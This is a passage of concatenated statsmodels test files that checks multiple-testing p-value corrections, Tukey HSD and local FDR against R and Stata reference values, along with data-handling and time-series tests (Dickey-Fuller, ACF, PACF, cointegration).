0.001, 0.002, 0.003, 0.004, 0.005, 0.05, 0.06, 0.07, 0.08, 0.09, 0.01,
0.02, 0.03, 0.04, 0.05, 0.5, 0.6, 0.7, 0.8, 0.9, 0.01, 0.018, 0.024,
0.028, 0.03, 0.25, 0.25, 0.25, 0.25, 0.25, 0.01, 0.018, 0.024, 0.028,
0.03, 0.09, 0.09, 0.09, 0.09, 0.09, 0.00995511979025177,
0.01982095664805061, 0.02959822305108317, 0.03928762649718986,
0.04888986953422814, 0.4012630607616213, 0.4613848859051006,
0.5160176928207072, 0.5656115457763677, 0.6105838818818925,
0.00995511979025177, 0.0178566699880266, 0.02374950634358763,
0.02766623106147537, 0.02962749064373438, 0.2262190625000001,
0.2262190625000001, 0.2262190625000001, 0.2262190625000001,
0.2262190625000001, 0.01, 0.01, 0.01, 0.01, 0.01, 0.08333333333333334,
0.0857142857142857, 0.0875, 0.0888888888888889, 0.09,
0.02928968253968254, 0.02928968253968254, 0.02928968253968254,
0.02928968253968254, 0.02928968253968254, 0.2440806878306878,
0.2510544217687075, 0.2562847222222222, 0.2603527336860670,
0.2636071428571428, NA, NA, NA, NA, NA, NA, NA, NA, NA, NA, 0.005,
0.005, 0.005, 0.005, 0.005, 0.04166666666666667, 0.04285714285714286,
0.04375, 0.04444444444444445, 0.045
]).reshape(10, 10, order='F')
res0_large = np.array([
0.00031612, 0.0003965, 0.00048442, 0.00051932, 0.00101436, 0.00121506,
0.0014516, 0.00265684, 0.00430043, 0.01743686, 0.02080285, 0.02785414,
0.0327198, 0.03494679, 0.04206808, 0.08067095, 0.23882767, 0.28352304,
0.36140401, 0.43565145, 0.44866768, 0.45368782, 0.48282088,
0.49223781, 0.55451638, 0.6207473, 0.71847853, 0.72424145, 0.85950263,
0.89032747, 0.0094836, 0.011895, 0.0145326, 0.0155796, 0.0304308,
0.0364518, 0.043548, 0.0797052, 0.1290129, 0.5231058, 0.6240855,
0.8356242, 0.981594, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 0.0094836, 0.0114985, 0.01356376, 0.01402164, 0.02637336,
0.0303765, 0.0348384, 0.06110732, 0.09460946, 0.36617406, 0.416057,
0.52922866, 0.5889564, 0.59409543, 0.67308928, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 0.0094836, 0.0114985, 0.01356376, 0.01402164,
0.02637336, 0.0303765, 0.0348384, 0.06110732, 0.09460946, 0.36617406,
0.416057, 0.52922866, 0.5889564, 0.59409543, 0.67308928, 0.89032747,
0.89032747, 0.89032747, 0.89032747, 0.89032747, 0.89032747,
0.89032747, 0.89032747, 0.89032747, 0.89032747, 0.89032747,
0.89032747, 0.89032747, 0.89032747, 0.89032747, 0.009440257627368331,
0.01182686507401931, 0.01443098172617119, 0.01546285007478554,
0.02998742566629453, 0.03581680249125385, 0.04264369065603335,
0.0767094173291795, 0.1212818694859857, 0.410051586220387,
0.4677640287633493, 0.5715077903157826, 0.631388450393325,
0.656016359012282, 0.724552174001554, 0.919808283456286,
0.999721715014484, 0.9999547032674126, 0.9999985652190126,
0.999999964809746, 0.999999982525548, 0.999999986719131,
0.999999997434160, 0.999999998521536, 0.999999999970829,
0.999999999999767, 1, 1, 1, 1, 0.009440257627368331,
0.01143489901147732, 0.0134754287611275, 0.01392738605848343,
0.0260416568490015, 0.02993768724817902, 0.0342629726119179,
0.0593542206208364, 0.09045742964699988, 0.308853956167216,
0.343245865702423, 0.4153483370083637, 0.4505333180190900,
0.453775200643535, 0.497247406680671, 0.71681858015803,
0.978083969553718, 0.986889206426321, 0.995400461639735,
0.9981506396214986, 0.9981506396214986, 0.9981506396214986,
0.9981506396214986, 0.9981506396214986, 0.9981506396214986,
0.9981506396214986, 0.9981506396214986, 0.9981506396214986,
0.9981506396214986, 0.9981506396214986, 0.0038949, 0.0038949,
0.0038949, 0.0038949, 0.0060753, 0.0060753, 0.006221142857142857,
0.00996315, 0.01433476666666667, 0.05231058, 0.05673504545454545,
0.06963535, 0.07488597857142856, 0.07488597857142856, 0.08413616,
0.15125803125, 0.421460594117647, 0.4725384, 0.570637910526316,
0.6152972625, 0.6152972625, 0.6152972625, 0.6152972625, 0.6152972625,
0.665419656, 0.7162468846153845, 0.775972982142857, 0.775972982142857,
0.889140651724138, 0.89032747, 0.01556007537622183,
0.01556007537622183, 0.01556007537622183, 0.01556007537622183,
0.02427074531648065, 0.02427074531648065, 0.02485338565390302,
0.0398026560334295, 0.0572672083580799, 0.2089800939109816,
0.2266557764630925, 0.2781923271071372, 0.2991685206792373,
0.2991685206792373, 0.336122876445059, 0.6042738882921044, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.00220711, 0.00220711, 0.00220711,
0.00220711, 0.00344267, 0.00344267, 0.003525314285714285, 0.005645785,
0.00812303444444444, 0.029642662, 0.0321498590909091,
0.03946003166666667, 0.04243538785714285, 0.04243538785714285,
0.0476771573333333, 0.085712884375, 0.23882767, 0.26777176,
0.323361482631579, 0.34866844875, 0.34866844875, 0.34866844875,
0.34866844875, 0.34866844875, 0.3770711384, 0.4058732346153846,
0.4397180232142857, 0.4397180232142857, 0.503846369310345,
0.504518899666667, 0.00272643, 0.00272643, 0.00272643, 0.00272643,
0.00425271, 0.00425271, 0.0043548, 0.006974205, 0.01003433666666667,
0.036617406, 0.03971453181818182, 0.048744745, 0.052420185,
0.052420185, 0.058895312, 0.105880621875, 0.295022415882353,
0.33077688, 0.399446537368421, 0.43070808375, 0.43070808375,
0.43070808375, 0.43070808375, 0.43070808375, 0.4657937592,
0.5013728192307692, 0.5431810875, 0.5431810875, 0.622398456206897,
0.623229229
]).reshape(30, 10, order='F')
class CheckMultiTestsMixin(object):
@pytest.mark.parametrize('key,val', sorted(rmethods.items()))
def test_multi_pvalcorrection_rmethods(self, key, val):
# test against R package multtest mt.rawp2adjp
res_multtest = self.res2
pval0 = res_multtest[:, 0]
if val[1] in self.methods:
reject, pvalscorr = multipletests(pval0,
alpha=self.alpha,
method=val[1])[:2]
assert_almost_equal(pvalscorr, res_multtest[:, val[0]], 15)
assert_equal(reject, pvalscorr <= self.alpha)
def test_multi_pvalcorrection(self):
# test against R package multtest mt.rawp2adjp
res_multtest = self.res2
pval0 = res_multtest[:, 0]
pvalscorr = np.sort(fdrcorrection(pval0, method='n')[1])
assert_almost_equal(pvalscorr, res_multtest[:, 7], 15)
pvalscorr = np.sort(fdrcorrection(pval0, method='i')[1])
assert_almost_equal(pvalscorr, res_multtest[:, 6], 15)
class TestMultiTests1(CheckMultiTestsMixin):
@classmethod
def setup_class(cls):
cls.methods = ['b', 's', 'sh', 'hs', 'h', 'fdr_i', 'fdr_n']
cls.alpha = 0.1
cls.res2 = res_multtest1
class TestMultiTests2(CheckMultiTestsMixin):
    # case: all hypotheses rejected (except 'b' and 's')
@classmethod
def setup_class(cls):
cls.methods = ['b', 's', 'sh', 'hs', 'h', 'fdr_i', 'fdr_n']
cls.alpha = 0.05
cls.res2 = res_multtest2
class TestMultiTests3(CheckMultiTestsMixin):
@classmethod
def setup_class(cls):
cls.methods = ['b', 's', 'sh', 'hs', 'h', 'fdr_i', 'fdr_n',
'fdr_tsbh']
cls.alpha = 0.05
cls.res2 = res0_large
class TestMultiTests4(CheckMultiTestsMixin):
    # in simulations, all two-stage fdr methods (fdr_tsbky, fdr_tsbh, fdr_gbs)
    # have, in some cases (cases with a large alternative), an FDR that looks
    # too large; this is the first such case: #rejected = 12, the DGP has 10
    # false null hypotheses
@classmethod
def setup_class(cls):
cls.methods = ['b', 's', 'sh', 'hs', 'h', 'fdr_i', 'fdr_n',
'fdr_tsbh']
cls.alpha = 0.05
cls.res2 = res_multtest3
@pytest.mark.parametrize('alpha', [0.01, 0.05, 0.1])
@pytest.mark.parametrize('method', ['b', 's', 'sh', 'hs', 'h', 'hommel',
'fdr_i', 'fdr_n', 'fdr_tsbky',
'fdr_tsbh', 'fdr_gbs'])
@pytest.mark.parametrize('ii', list(range(11)))
def test_pvalcorrection_reject(alpha, method, ii):
# consistency test for reject boolean and pvalscorr
pval1 = np.hstack((np.linspace(0.0001, 0.0100, ii),
np.linspace(0.05001, 0.11, 10 - ii)))
# using .05001 instead of 0.05 to avoid edge case issue #768
reject, pvalscorr = multipletests(pval1, alpha=alpha,
method=method)[:2]
msg = 'case %s %3.2f rejected:%d\npval_raw=%r\npvalscorr=%r' % (
method, alpha, reject.sum(), pval1, pvalscorr)
assert_equal(reject, pvalscorr <= alpha, err_msg=msg)
def test_hommel():
# tested against R stats p_adjust(pval0, method='hommel')
pval0 = np.array([
0.00116, 0.00924, 0.01075, 0.01437, 0.01784, 0.01918,
0.02751, 0.02871, 0.03054, 0.03246, 0.04259, 0.06879,
0.0691, 0.08081, 0.08593, 0.08993, 0.09386, 0.09412,
0.09718, 0.09758, 0.09781, 0.09788, 0.13282, 0.20191,
0.21757, 0.24031, 0.26061, 0.26762, 0.29474, 0.32901,
0.41386, 0.51479, 0.52461, 0.53389, 0.56276, 0.62967,
0.72178, 0.73403, 0.87182, 0.95384])
result_ho = np.array([
0.0464, 0.25872, 0.29025,
0.3495714285714286, 0.41032, 0.44114,
0.57771, 0.60291, 0.618954,
0.6492, 0.7402725000000001, 0.86749,
0.86749, 0.8889100000000001, 0.8971477777777778,
0.8993, 0.9175374999999999, 0.9175374999999999,
0.9175374999999999, 0.9175374999999999, 0.9175374999999999,
0.9175374999999999, 0.95384, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001, 0.9538400000000001, 0.9538400000000001,
0.9538400000000001])
rej, pvalscorr, _, _ = multipletests(pval0, alpha=0.1, method='ho')
assert_almost_equal(pvalscorr, result_ho, 15)
assert_equal(rej, result_ho < 0.1)
def test_fdr_bky():
# test for fdrcorrection_twostage
# example from BKY
pvals = [
0.0001, 0.0004, 0.0019, 0.0095, 0.0201, 0.0278, 0.0298, 0.0344, 0.0459,
0.3240, 0.4262, 0.5719, 0.6528, 0.7590, 1.000]
# no test for corrected p-values, but they are inherited
# same number of rejection as in BKY paper:
# single step-up:4, two-stage:8, iterated two-step:9
# also alpha_star is the same as theirs for TST
# alpha_star for stage 2
res_tst = fdrcorrection_twostage(pvals, alpha=0.05, iter=False)
assert_almost_equal([0.047619, 0.0649], res_tst[-1][:2], 3)
assert_equal(8, res_tst[0].sum())
@pytest.mark.parametrize('method', sorted(multitest_methods_names))
def test_issorted(method):
# test that is_sorted keyword works correctly
# the fdrcorrection functions are tested indirectly
# data generated as random numbers np.random.beta(0.2, 0.5, size=10)
pvals = np.array([31, 9958111, 7430818, 8653643, 9892855, 876, 2651691,
145836, 9931, 6174747]) * 1e-7
sortind = np.argsort(pvals)
sortrevind = sortind.argsort()
pvals_sorted = pvals[sortind]
res1 = multipletests(pvals, method=method, is_sorted=False)
res2 = multipletests(pvals_sorted, method=method, is_sorted=True)
assert_equal(res2[0][sortrevind], res1[0])
assert_allclose(res2[0][sortrevind], res1[0], rtol=1e-10)
@pytest.mark.parametrize('method', sorted(multitest_methods_names))
def test_floating_precision(method):
# issue #7465
pvals = np.full(6000, 0.99)
pvals[0] = 1.138569e-56
assert multipletests(pvals, method=method)[1][0] > 1e-60
def test_tukeyhsd():
# example multicomp in R p 83
res = '''\
pair diff lwr upr p adj
P-M 8.150000 -10.037586 26.3375861 0.670063958
S-M -3.258333 -21.445919 14.9292527 0.982419709
T-M 23.808333 5.620747 41.9959194 0.006783701
V-M 4.791667 -13.395919 22.9792527 0.931020848
S-P -11.408333 -29.595919 6.7792527 0.360680099
T-P 15.658333 -2.529253 33.8459194 0.113221634
V-P -3.358333 -21.545919 14.8292527 0.980350080
T-S 27.066667 8.879081 45.2542527 0.002027122
V-S 8.050000 -10.137586 26.2375861 0.679824487
V-T -19.016667 -37.204253 -0.8290806 0.037710044
'''
res = np.array([
[8.150000, -10.037586, 26.3375861, 0.670063958],
[-3.258333, -21.445919, 14.9292527, 0.982419709],
[23.808333, 5.620747, 41.9959194, 0.006783701],
[4.791667, -13.395919, 22.9792527, 0.931020848],
[-11.408333, -29.595919, 6.7792527, 0.360680099],
[15.658333, -2.529253, 33.8459194, 0.113221634],
[-3.358333, -21.545919, 14.8292527, 0.980350080],
[27.066667, 8.879081, 45.2542527, 0.002027122],
[8.050000, -10.137586, 26.2375861, 0.679824487],
[-19.016667, -37.204253, -0.8290806, 0.037710044]])
m_r = [94.39167, 102.54167, 91.13333, 118.20000, 99.18333]
myres = tukeyhsd(m_r, 6, 110.8, alpha=0.05, df=4)
pairs, reject, meandiffs, std_pairs, confint, q_crit = myres[:6]
assert_almost_equal(meandiffs, res[:, 0], decimal=5)
assert_almost_equal(confint, res[:, 1:3], decimal=2)
assert_equal(reject, res[:, 3] < 0.05)
# check p-values (divergence of high values is expected)
small_pvals_idx = [2, 5, 7, 9]
assert_allclose(myres[8][small_pvals_idx], res[small_pvals_idx, 3],
rtol=1e-3)
def test_local_fdr():
# Create a mixed population of Z-scores: 1000 standard normal and
# 20 uniformly distributed between 3 and 4.
grid = np.linspace(0.001, 0.999, 1000)
z0 = norm.ppf(grid)
z1 = np.linspace(3, 4, 20)
zs = np.concatenate((z0, z1))
# Exact local FDR for U(3, 4) component.
f1 = np.exp(-z1**2 / 2) / np.sqrt(2*np.pi)
r = len(z1) / float(len(z0) + len(z1))
f1 /= (1 - r) * f1 + r
for alpha in None, 0, 1e-8:
if alpha is None:
fdr = local_fdr(zs)
else:
fdr = local_fdr(zs, alpha=alpha)
fdr1 = fdr[len(z0):]
assert_allclose(f1, fdr1, rtol=0.05, atol=0.1)
def test_null_distribution():
# Create a mixed population of Z-scores: 1000 standard normal and
# 20 uniformly distributed between 3 and 4.
grid = np.linspace(0.001, 0.999, 1000)
z0 = norm.ppf(grid)
z1 = np.linspace(3, 4, 20)
zs = np.concatenate((z0, z1))
emp_null = NullDistribution(zs, estimate_null_proportion=True)
assert_allclose(emp_null.mean, 0, atol=1e-5, rtol=1e-5)
assert_allclose(emp_null.sd, 1, atol=1e-5, rtol=1e-2)
assert_allclose(emp_null.null_proportion, 0.98, atol=1e-5, rtol=1e-2)
# consistency check
assert_allclose(emp_null.pdf(np.r_[-1, 0, 1]),
norm.pdf(np.r_[-1, 0, 1],
loc=emp_null.mean, scale=emp_null.sd),
rtol=1e-13)
@pytest.mark.parametrize('estimate_prob', [True, False])
@pytest.mark.parametrize('estimate_scale', [True, False])
@pytest.mark.parametrize('estimate_mean', [True, False])
def test_null_constrained(estimate_mean, estimate_scale, estimate_prob):
# Create a mixed population of Z-scores: 1000 standard normal and
# 20 uniformly distributed between 3 and 4.
grid = np.linspace(0.001, 0.999, 1000)
z0 = norm.ppf(grid)
z1 = np.linspace(3, 4, 20)
zs = np.concatenate((z0, z1))
emp_null = NullDistribution(zs, estimate_mean=estimate_mean,
estimate_scale=estimate_scale,
estimate_null_proportion=estimate_prob)
if not estimate_mean:
assert_allclose(emp_null.mean, 0, atol=1e-5, rtol=1e-5)
if not estimate_scale:
assert_allclose(emp_null.sd, 1, atol=1e-5, rtol=1e-2)
if not estimate_prob:
assert_allclose(emp_null.null_proportion, 1, atol=1e-5, rtol=1e-2)
# consistency check
assert_allclose(emp_null.pdf(np.r_[-1, 0, 1]),
norm.pdf(np.r_[-1, 0, 1], loc=emp_null.mean,
scale=emp_null.sd),
rtol=1e-13)
```
#### File: tools/tests/test_data.py
```python
import numpy as np
import pandas
from statsmodels.tools import data
def test_missing_data_pandas():
"""
Fixes GH: #144
"""
X = np.random.random((10, 5))
X[1, 2] = np.nan
df = pandas.DataFrame(X)
vals, cnames, rnames = data.interpret_data(df)
np.testing.assert_equal(rnames.tolist(), [0, 2, 3, 4, 5, 6, 7, 8, 9])
def test_dataframe():
X = np.random.random((10, 5))
df = pandas.DataFrame(X)
vals, cnames, rnames = data.interpret_data(df)
np.testing.assert_equal(vals, df.values)
np.testing.assert_equal(rnames.tolist(), df.index.tolist())
np.testing.assert_equal(cnames, df.columns.tolist())
def test_patsy_577():
X = np.random.random((10, 2))
df = pandas.DataFrame(X, columns=["var1", "var2"])
from patsy import dmatrix
endog = dmatrix("var1 - 1", df)
np.testing.assert_(data._is_using_patsy(endog, None))
exog = dmatrix("var2 - 1", df)
np.testing.assert_(data._is_using_patsy(endog, exog))
```
#### File: tsa/tests/test_stattools.py
```python
from statsmodels.compat.numpy import lstsq
from statsmodels.compat.pandas import assert_index_equal
from statsmodels.compat.platform import PLATFORM_WIN
from statsmodels.compat.python import lrange
import os
import warnings
import numpy as np
from numpy.testing import (
assert_,
assert_allclose,
assert_almost_equal,
assert_equal,
assert_raises,
)
import pandas as pd
from pandas import DataFrame, Series, date_range
import pytest
from scipy.interpolate import interp1d
from statsmodels.datasets import macrodata, modechoice, nile, randhie, sunspots
from statsmodels.tools.sm_exceptions import (
CollinearityWarning,
InfeasibleTestError,
InterpolationWarning,
MissingDataError,
)
# Remove imports when range unit root test gets an R implementation
from statsmodels.tools.validation import array_like, bool_like
from statsmodels.tsa.arima_process import arma_acovf
from statsmodels.tsa.statespace.sarimax import SARIMAX
from statsmodels.tsa.stattools import (
acf,
acovf,
adfuller,
arma_order_select_ic,
breakvar_heteroskedasticity_test,
ccovf,
coint,
grangercausalitytests,
innovations_algo,
innovations_filter,
kpss,
levinson_durbin,
levinson_durbin_pacf,
pacf,
pacf_burg,
pacf_ols,
pacf_yw,
range_unit_root_test,
zivot_andrews,
)
DECIMAL_8 = 8
DECIMAL_6 = 6
DECIMAL_5 = 5
DECIMAL_4 = 4
DECIMAL_3 = 3
DECIMAL_2 = 2
DECIMAL_1 = 1
CURR_DIR = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture(scope="module")
def acovf_data():
rnd = np.random.RandomState(12345)
return rnd.randn(250)
class CheckADF(object):
"""
Test Augmented Dickey-Fuller
Test values taken from Stata.
"""
levels = ["1%", "5%", "10%"]
data = macrodata.load_pandas()
x = data.data["realgdp"].values
y = data.data["infl"].values
def test_teststat(self):
assert_almost_equal(self.res1[0], self.teststat, DECIMAL_5)
def test_pvalue(self):
assert_almost_equal(self.res1[1], self.pvalue, DECIMAL_5)
def test_critvalues(self):
critvalues = [self.res1[4][lev] for lev in self.levels]
assert_almost_equal(critvalues, self.critvalues, DECIMAL_2)
class TestADFConstant(CheckADF):
"""
Dickey-Fuller test for unit root
"""
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.x, regression="c", autolag=None, maxlag=4)
cls.teststat = 0.97505319
cls.pvalue = 0.99399563
cls.critvalues = [-3.476, -2.883, -2.573]
class TestADFConstantTrend(CheckADF):
""""""
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.x, regression="ct", autolag=None, maxlag=4)
cls.teststat = -1.8566374
cls.pvalue = 0.67682968
cls.critvalues = [-4.007, -3.437, -3.137]
# FIXME: do not leave commented-out
# class TestADFConstantTrendSquared(CheckADF):
# """
# """
# pass
# TODO: get test values from R?
class TestADFNoConstant(CheckADF):
""""""
@classmethod
def setup_class(cls):
with pytest.warns(FutureWarning):
adfuller(cls.x, regression="nc", autolag=None, maxlag=4)
cls.res1 = adfuller(cls.x, regression="n", autolag=None, maxlag=4)
cls.teststat = 3.5227498
cls.pvalue = 0.99999
# Stata does not return a p-value for noconstant.
# Tau^max in MacKinnon (1994) is missing, so it is
# assumed that its right-tail is well-behaved
cls.critvalues = [-2.587, -1.950, -1.617]
# No Unit Root
class TestADFConstant2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="c", autolag=None, maxlag=1)
cls.teststat = -4.3346988
cls.pvalue = 0.00038661
cls.critvalues = [-3.476, -2.883, -2.573]
class TestADFConstantTrend2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="ct", autolag=None, maxlag=1)
cls.teststat = -4.425093
cls.pvalue = 0.00199633
cls.critvalues = [-4.006, -3.437, -3.137]
class TestADFNoConstant2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="n", autolag=None, maxlag=1)
cls.teststat = -2.4511596
cls.pvalue = 0.013747
# Stata does not return a p-value for noconstant
# this value is just taken from our results
cls.critvalues = [-2.587, -1.950, -1.617]
_, _1, _2, cls.store = adfuller(
cls.y, regression="n", autolag=None, maxlag=1, store=True
)
def test_store_str(self):
assert_equal(
self.store.__str__(), "Augmented Dickey-Fuller Test Results"
)
class CheckCorrGram(object):
"""
Set up for ACF, PACF tests.
"""
data = macrodata.load_pandas()
x = data.data["realgdp"]
filename = os.path.join(CURR_DIR, "results", "results_corrgram.csv")
results = pd.read_csv(filename, delimiter=",")
class TestACF(CheckCorrGram):
"""
Test Autocorrelation Function
"""
@classmethod
def setup_class(cls):
cls.acf = cls.results["acvar"]
# cls.acf = np.concatenate(([1.], cls.acf))
cls.qstat = cls.results["Q1"]
cls.res1 = acf(cls.x, nlags=40, qstat=True, alpha=0.05, fft=False)
cls.confint_res = cls.results[["acvar_lb", "acvar_ub"]].values
def test_acf(self):
assert_almost_equal(self.res1[0][1:41], self.acf, DECIMAL_8)
def test_confint(self):
centered = self.res1[1] - self.res1[1].mean(1)[:, None]
assert_almost_equal(centered[1:41], self.confint_res, DECIMAL_8)
def test_qstat(self):
assert_almost_equal(self.res1[2][:40], self.qstat, DECIMAL_3)
# 3 decimal places because of stata rounding
# FIXME: enable/xfail/skip or delete
# def pvalue(self):
# pass
# NOTE: should not need testing if Q stat is correct
class TestACF_FFT(CheckCorrGram):
# Test Autocorrelation Function using FFT
@classmethod
def setup_class(cls):
cls.acf = cls.results["acvarfft"]
cls.qstat = cls.results["Q1"]
cls.res1 = acf(cls.x, nlags=40, qstat=True, fft=True)
def test_acf(self):
assert_almost_equal(self.res1[0][1:], self.acf, DECIMAL_8)
def test_qstat(self):
# todo why is res1/qstat 1 short
assert_almost_equal(self.res1[1], self.qstat, DECIMAL_3)
class TestACFMissing(CheckCorrGram):
# Test Autocorrelation Function using Missing
@classmethod
def setup_class(cls):
cls.x = np.concatenate((np.array([np.nan]), cls.x))
cls.acf = cls.results["acvar"] # drop and conservative
cls.qstat = cls.results["Q1"]
cls.res_drop = acf(
cls.x, nlags=40, qstat=True, alpha=0.05, missing="drop", fft=False
)
cls.res_conservative = acf(
cls.x,
nlags=40,
qstat=True,
alpha=0.05,
fft=False,
missing="conservative",
)
cls.acf_none = np.empty(40) * np.nan # lags 1 to 40 inclusive
cls.qstat_none = np.empty(40) * np.nan
cls.res_none = acf(
cls.x, nlags=40, qstat=True, alpha=0.05, missing="none", fft=False
)
def test_raise(self):
with pytest.raises(MissingDataError):
acf(
self.x,
nlags=40,
qstat=True,
fft=False,
alpha=0.05,
missing="raise",
)
def test_acf_none(self):
assert_almost_equal(self.res_none[0][1:41], self.acf_none, DECIMAL_8)
def test_acf_drop(self):
assert_almost_equal(self.res_drop[0][1:41], self.acf, DECIMAL_8)
def test_acf_conservative(self):
assert_almost_equal(
self.res_conservative[0][1:41], self.acf, DECIMAL_8
)
def test_qstat_none(self):
# todo why is res1/qstat 1 short
assert_almost_equal(self.res_none[2], self.qstat_none, DECIMAL_3)
# FIXME: enable/xfail/skip or delete
# how to do this test? the correct q_stat depends on whether nobs=len(x) is
# used when x contains NaNs or whether nobs<len(x) when x contains NaNs
# def test_qstat_drop(self):
# assert_almost_equal(self.res_drop[2][:40], self.qstat, DECIMAL_3)
class TestPACF(CheckCorrGram):
@classmethod
def setup_class(cls):
cls.pacfols = cls.results["PACOLS"]
cls.pacfyw = cls.results["PACYW"]
def test_ols(self):
pacfols, confint = pacf(self.x, nlags=40, alpha=0.05, method="ols")
assert_almost_equal(pacfols[1:], self.pacfols, DECIMAL_6)
centered = confint - confint.mean(1)[:, None]
# from edited Stata ado file
res = [[-0.1375625, 0.1375625]] * 40
assert_almost_equal(centered[1:41], res, DECIMAL_6)
# check lag 0
assert_equal(centered[0], [0.0, 0.0])
assert_equal(confint[0], [1, 1])
assert_equal(pacfols[0], 1)
def test_ols_inefficient(self):
lag_len = 5
pacfols = pacf_ols(self.x, nlags=lag_len, efficient=False)
x = self.x.copy()
x -= x.mean()
n = x.shape[0]
lags = np.zeros((n - 5, 5))
lead = x[5:]
direct = np.empty(lag_len + 1)
direct[0] = 1.0
for i in range(lag_len):
lags[:, i] = x[5 - (i + 1) : -(i + 1)]
direct[i + 1] = lstsq(lags[:, : (i + 1)], lead, rcond=None)[0][-1]
assert_allclose(pacfols, direct, atol=1e-8)
def test_yw(self):
pacfyw = pacf_yw(self.x, nlags=40, method="mle")
assert_almost_equal(pacfyw[1:], self.pacfyw, DECIMAL_8)
def test_ld(self):
pacfyw = pacf_yw(self.x, nlags=40, method="mle")
pacfld = pacf(self.x, nlags=40, method="ldb")
assert_almost_equal(pacfyw, pacfld, DECIMAL_8)
pacfyw = pacf(self.x, nlags=40, method="yw")
pacfld = pacf(self.x, nlags=40, method="lda")
assert_almost_equal(pacfyw, pacfld, DECIMAL_8)
class TestBreakvarHeteroskedasticityTest(object):
from scipy.stats import chi2, f
def test_1d_input(self):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
expected_statistic = (4.0 ** 2 + 5.0 ** 2) / (0.0 ** 2 + 1.0 ** 2)
# ~ F(2, 2), two-sided test
expected_pvalue = 2 * min(
self.f.cdf(expected_statistic, 2, 2),
self.f.sf(expected_statistic, 2, 2),
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
def test_2d_input_with_missing_values(self):
input_residuals = np.array(
[
[0.0, 0.0, np.nan],
[1.0, np.nan, 1.0],
[2.0, 2.0, np.nan],
[3.0, 3.0, 3.0],
[4.0, 4.0, 4.0],
[5.0, 5.0, 5.0],
[6.0, 6.0, 6.0],
[7.0, 7.0, 7.0],
[8.0, 8.0, 8.0],
]
)
expected_statistic = np.array(
[
(8.0 ** 2 + 7.0 ** 2 + 6.0 ** 2)
/ (0.0 ** 2 + 1.0 ** 2 + 2.0 ** 2),
(8.0 ** 2 + 7.0 ** 2 + 6.0 ** 2) / (0.0 ** 2 + 2.0 ** 2),
np.nan,
]
)
expected_pvalue = np.array(
[
2
* min(
self.f.cdf(expected_statistic[0], 3, 3),
self.f.sf(expected_statistic[0], 3, 3),
),
2
* min(
self.f.cdf(expected_statistic[1], 3, 2),
self.f.sf(expected_statistic[1], 3, 2),
),
np.nan,
]
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals
)
assert_equal(actual_statistic, expected_statistic)
assert_equal(actual_pvalue, expected_pvalue)
@pytest.mark.parametrize(
"subset_length,expected_statistic,expected_pvalue",
[
(2, 41, 2 * min(f.cdf(41, 2, 2), f.sf(41, 2, 2))),
(0.5, 10, 2 * min(f.cdf(10, 3, 3), f.sf(10, 3, 3))),
],
)
def test_subset_length(
self, subset_length, expected_statistic, expected_pvalue
):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
subset_length=subset_length,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
@pytest.mark.parametrize(
"alternative,expected_statistic,expected_pvalue",
[
("two-sided", 41, 2 * min(f.cdf(41, 2, 2), f.sf(41, 2, 2))),
("decreasing", 1 / 41, f.sf(1 / 41, 2, 2)),
("increasing", 41, f.sf(41, 2, 2)),
],
)
def test_alternative(
self, alternative, expected_statistic, expected_pvalue
):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
alternative=alternative,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
def test_use_chi2(self):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
expected_statistic = (4.0 ** 2 + 5.0 ** 2) / (0.0 ** 2 + 1.0 ** 2)
expected_pvalue = 2 * min(
self.chi2.cdf(2 * expected_statistic, 2),
self.chi2.sf(2 * expected_statistic, 2),
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
use_f=False,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
class CheckCoint(object):
"""
Test Cointegration Test Results for 2-variable system
Test values taken from Stata
"""
levels = ["1%", "5%", "10%"]
data = macrodata.load_pandas()
y1 = data.data["realcons"].values
y2 = data.data["realgdp"].values
def test_tstat(self):
assert_almost_equal(self.coint_t, self.teststat, DECIMAL_4)
# this does not produce the old results anymore
class TestCoint_t(CheckCoint):
"""
Get AR(1) parameter on residuals
"""
@classmethod
def setup_class(cls):
# cls.coint_t = coint(cls.y1, cls.y2, trend="c")[0]
cls.coint_t = coint(cls.y1, cls.y2, trend="c", maxlag=0, autolag=None)[
0
]
cls.teststat = -1.8208817
cls.teststat = -1.830170986148
def test_coint():
nobs = 200
scale_e = 1
const = [1, 0, 0.5, 0]
np.random.seed(123)
unit = np.random.randn(nobs).cumsum()
y = scale_e * np.random.randn(nobs, 4)
y[:, :2] += unit[:, None]
y += const
y = np.round(y, 4)
# FIXME: enable/xfail/skip or delete
for trend in []: # ['c', 'ct', 'ctt', 'n']:
print("\n", trend)
print(coint(y[:, 0], y[:, 1], trend=trend, maxlag=4, autolag=None))
print(coint(y[:, 0], y[:, 1:3], trend=trend, maxlag=4, autolag=None))
print(coint(y[:, 0], y[:, 2:], trend=trend, maxlag=4, autolag=None))
